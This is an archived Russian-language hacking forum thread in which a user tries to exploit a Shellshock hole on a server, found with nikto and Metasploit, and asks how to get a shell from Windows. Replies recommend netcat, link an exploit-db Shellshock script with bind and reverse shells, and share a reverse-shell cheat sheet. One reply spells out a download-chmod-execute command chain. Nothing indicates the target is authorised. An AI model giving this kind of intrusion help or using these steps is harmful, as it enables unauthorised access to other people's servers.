Просмотр полной версии : Ёбнутый но срочный вопрос
На 2:39 что он делает ?
У меня win через мету всё точно повторил и вроде как получилось но я линукс не юзаю
Я так понял он вызвал shell или типа того
Как это сделать на win ?
коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows
d1v said:
↑ (https://antichat.live/posts/4185173/)
коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows
спасибо
d1v said:
↑ (https://antichat.live/posts/4185173/)
коннектится неткатом к хосту
https://1cloud.ru/help/windows/netcat-na-windows
https://s8.hostingkartinok.com/uploads/images/2018/02/77cbef7622238f114a9b1af334263883.png
Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?
тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него
altblitz
17.02.2018, 02:34
Sensoft said:
↑ (https://antichat.live/posts/4185178/)
https://s8.hostingkartinok.com/uploads/images/2018/02/77cbef7622238f114a9b1af334263883.png
Получается касяк уже с эксплоитом или типа не так сделал на стадии метасплоита ?
тоже изначально nikto сканил там и показало возможность дыры по видео сделал так же только я на 2:14 сделал свой каталог как у меня в никте, вывод метосплоита такой же как и у него
Получается, что нужно запускать сплойт в Command Prompt (Admin).
altblitz said:
↑ (https://antichat.live/posts/4185184/)
Получается, что нужно запускать сплойт в Command Prompt (
Admin
).
подробнее можно ?
altblitz said:
↑ (https://antichat.live/posts/4185184/)
Получается, что нужно запускать сплойт в Command Prompt (
Admin
).
какой смысл запускать cmd от админа ? это на метосплоит вообще не как не влияет
Code:
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php4: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php5: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php-cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271).
+ OSVDB-112004: /php.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278).
+ OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /php.fcgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6271). + OSVDB-112004: /printenv: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-6278). + OSVDB-112004: /restore_config.cgi: Site appears vulnerable to the 'shellshock' vulnerability (http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2 14-6271).
возьми шел на питоне
_https://www.exploit-db.com/exploits/34900/
Там есть и бинд и реверс..
Для таких вещей нужно пересаживаться на linux, и куча вопросов отпадет сама по себе.
А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc
zifus said:
↑ (https://antichat.live/posts/4185195/)
А вообще если ты делал все как на видео, на сервере может быть просто не установлен nc
99% что этого нет )
nc получается обязано быть (
ну тогда всё тупик
Sensoft said:
↑ (https://antichat.live/posts/4185196/)
99% что этого нет )
nc получается обязано быть (
ну тогда всё тупик
nc не обязано быть. Тебе дали ответ: используй интерпретаторы для бинда и реверса. На крайний случай можно и скачать что-то: wget http://file, chmod +x /tmp/file, /tmp/file
Sensoft said:
↑ (https://antichat.live/posts/4185196/)
ну тогда всё тупик
http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
vBulletin® v3.8.14, Copyright ©2000-2026, vBulletin Solutions, Inc. Перевод: zCarot